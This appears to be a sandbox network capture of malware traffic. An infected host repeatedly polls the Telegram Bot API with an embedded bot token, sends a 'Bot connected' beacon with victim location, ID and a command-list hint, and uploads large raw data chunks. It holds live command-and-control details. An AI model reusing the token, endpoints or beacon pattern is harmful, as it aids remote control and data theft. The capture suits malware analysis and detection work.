2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: 6a 80 a0 72 58 ef ff 83 5b b6 27 2c c7 01 bd 88 c0 82 dc 6a 07 14 e3 5a d3 66 ee 13 d3 90 51 91 87 68 69 ad 40 74 dd df 82 14 76 a4 b2 43 67 bc 78 5c f7 80 3e c4 28 99 fa 16 67 b4 fe 4f bd e5 84 d3 d0 65 41 ee 4d 79 d7 2a 47 45 aa d6 be 2d 9b b8 bc 81 bd b7 04 e6 41 cc 48 26 0f 49 cc 97 d7 3a b5 f4 fb 4a 8b 45 cc 2f 58 70 df af d4 b8 02 a5 66 8b 0c 72 b2 ca e1 c0 d7 d6 c2 f7 98 68 c9 d5 cb 6e 21 5b 5f 94 83 42 d5 04 34 28 0f 2b a9 52 55 50 9f 69 2b 84 5c eb 7c 97 c9 f7 d6 0b e4 c8 43 42 f9 69 74 68 cd 88 33 0d 00 b8 ca 69 b7 52 41 9d 27 eb 47 01 95 29 ee f6 91 5c 20 58 a2 f3 76 48 ca b2 9c ad 9b 7a 6b 10 db f4 4a e2 3c da d9 e2 dd 7a 0a 59 a5 37 38 6b e0 77 13 c1 8a bb 13 ca 58 15 9a 9e 6b 15 57 4c 8d a1 29 f0 a6 03 36 b0 a6 57 ac c9 30 1b f8 b5 f4 6c ce Data Ascii: jrX[',jZfQhi@tvCgx\>(gOeAMy*GE-AH&I:JE/Xpfrhn![_B4(+RUPi+\\|CBith3iRA'G)\ XvHzkJ<zY78kwXkWL)6W0l
2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: 58 b7 6e ba 12 f9 71 3f 4c 3c f4 c5 e6 76 b5 95 2e 40 7f 85 fc 70 f0 48 b7 29 5f 4c c5 98 0a 59 70 89 a8 27 fc 65 b9 59 de 8d f7 ab c6 69 28 f8 fe 32 e2 1f eb a7 90 22 f7 e6 03 fc 28 37 42 0e 9c 58 f3 9f 0b 43 c1 06 3d 92 26 49 3a e4 4d 9c 18 f4 2c 40 40 4f 45 8e a9 78 f1 c2 1f 9c 51 55 5e ba b1 82 1d ea c7 7d 68 d9 ff 57 3d ce 46 e5 74 e0 16 92 f7 4b 5f 8c 43 0c dc 51 40 d6 9e 47 9e e5 9b 1c 9b af 1a 0c 25 d7 78 73 92 8b 54 a7 54 f5 e2 31 ab e8 93 46 94 11 a0 ea c8 57 7b 78 42 2f 59 3b b2 2c 1e 08 ca d2 59 98 c4 8d aa fe db 9c 33 a8 00 11 be b0 fd d9 89 36 b7 a6 ba 2a 24 4d f0 c5 03 cd a0 12 35 0a 8f 5b e5 e0 16 87 8c 0f b0 65 82 b0 e2 24 2f fc e4 05 f0 f8 03 e6 db 5c f1 be 4e b3 97 72 f0 a2 72 67 bd 13 59 f1 9b 21 c8 90 4c 5a a7 e2 03 f8 58 db 80 53 78 Data Ascii: Xnq?L<v.@pH)_LYp'eYi(2"(7BXC=&I:M,@@OExQU^}hW=FtK_CQ@G%xsTT1FW{xB/Y;,Y36*$M5[e$/\NrrgY!LZXSx
2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: 6f 0f ca 37 9c f8 25 d2 32 3f c2 bc b4 b2 7d b4 a0 15 71 eb 22 8b 8b ef 4e fb 01 d7 60 5d 69 f6 15 6f 0f 40 3a 98 11 ea d3 e7 e1 2e bc b1 b8 97 f0 01 0c db 48 82 0c b9 58 b7 0f ad be 79 70 e1 84 08 26 57 94 09 ee 71 4d 28 c3 0d 86 65 bb f7 42 0d 58 8d dd a1 1a 5b fb 74 5d 98 25 6d 5e 7f 0e cd 71 60 7c ea f0 7f 55 40 da dc 0e 42 5f 31 01 d3 a4 13 1a a7 b9 f7 3b 33 23 97 33 47 01 9e 6f 72 c1 c0 b6 ab b0 b6 b5 dd 24 aa a3 9e 18 8a 84 9e 52 99 a0 3a 93 41 5c 71 bf 11 7e f2 d2 52 4f 8f bb 05 23 da f4 c3 d7 3c 0a 6f d7 05 3e b7 40 5f 70 63 b1 94 59 59 7f bb 7c 3b f2 79 bd 24 53 5e 5e e1 e0 ca 26 9e a6 0c 41 48 8d 6b 7a af 75 38 4f 3f b5 8d 3f 2f e4 97 cf 65 f3 21 4d b7 5f f6 bf ca 82 d8 91 fa bf 8f 1e 05 2b 21 41 71 0e e5 23 b1 70 4c 80 4b de e0 ec f0 b0 e4 ae Data Ascii: o7%2?}q"N`]io@:.HXyp&WqM(eBX[t]%m^q`\|U@B_1;3#3Gor$R:A\q~RO#<o>@_pcYY\|;y$S^^&AHkzu8O??/e!M_+!Aq#pLK
2024-09-02 14:51:12 UTC	16384	OUT	Data Raw: 20 2d 8a d9 ac 42 b9 ff d2 1c 81 cd 0f 8c 57 f3 99 0e e5 2e 57 73 7c b8 60 27 26 59 b5 69 45 57 29 4f c5 43 7c ef 82 8e 53 fb 13 0d 70 0f 20 b0 80 e1 0d 02 6d 4b 2c a2 01 29 2b df ff fc 07 37 11 9c ad 74 c0 07 82 4e 32 df a2 09 56 f0 1e c3 7c d1 b1 9f 58 6c ae 84 38 bb b9 95 96 17 1b f3 aa 8e b3 06 7b 88 e8 58 3e 0b 15 ea 6b 19 1d 1a 60 0b fd f9 97 95 23 37 63 c2 dd 48 1b f4 98 5e 6d 0e 66 9f 5d f0 ea 53 2b 8e ba 75 c3 82 a2 6e 5d 54 3e bb 85 02 ec 3b 51 a4 80 07 29 02 88 77 66 34 0f 13 d3 2e 9c 6e 3f 6d 8d 8e 8e 96 b7 28 29 72 96 08 18 59 85 b1 38 ad 3c b5 cf 01 63 68 c6 fb 89 03 a8 f2 59 c7 05 67 8a 76 f5 8f 1e d7 df ce b0 59 c2 50 bd 87 d2 d9 11 6f 60 20 d7 d0 73 a2 c5 21 37 17 ab db 96 1c 70 97 a1 be c1 45 ab a5 9f 47 b5 34 07 6c bd 58 97 aa 1f 68 64 Data Ascii: -BW.Ws\|`'&YiEW)OC\|Sp mK,)+7tN2V\|Xl8{X>k`#7cH^mf]S+un]T>;Q)wf4.n?m()rY8<chYgvYPo` s!7pEG4lXhd
2024-09-02 14:51:13 UTC	344	IN	HTTP/1.1 403 Forbidden Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:13 GMT Content-Type: application/json Content-Length: 83 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	56220	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:13 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:13 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:13 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	56221	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:15 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:15 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:15 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	56222	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:16 UTC	384	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20New%20York,%20ID:%202919%0A%E2%84%B9%EF%B8%8FSend%20%22/2919*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-02 14:51:16 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:16 GMT Content-Type: application/json Content-Length: 511 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:16 UTC	511	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 32 30 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 35 38 32 33 39 33 31 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 33 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 33 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 34 35 35 32 36 30 30 33 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 33 32 5c 75 30 34 33 37 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 63 20 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 32 5c 75 30 34 33 35 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 Data Ascii: {"ok":true,"result":{"message_id":42072,"from":{"id":7258239318,"is_bot":true,"first_name":"legless3bot","username":"legless3bot"},"chat":{"id":-1002245526003,"title":"\u0432\u0437\u043b\u043e\u043c \u0442\u0435\u0432\u0435","type":"supergroup"},"date":17

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.5	56223	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:17 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:17 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:17 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:17 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	56224	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:17 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:17 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:17 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:17 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.5	56227	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:19 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:19 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:19 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:19 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.5	56226	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:19 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:19 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:19 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:19 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.5	56230	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:21 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:21 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:21 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:21 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.5	56231	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:21 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:21 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:21 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:21 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.5	56233	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:22 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:23 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:23 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.5	56234	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:22 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:23 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
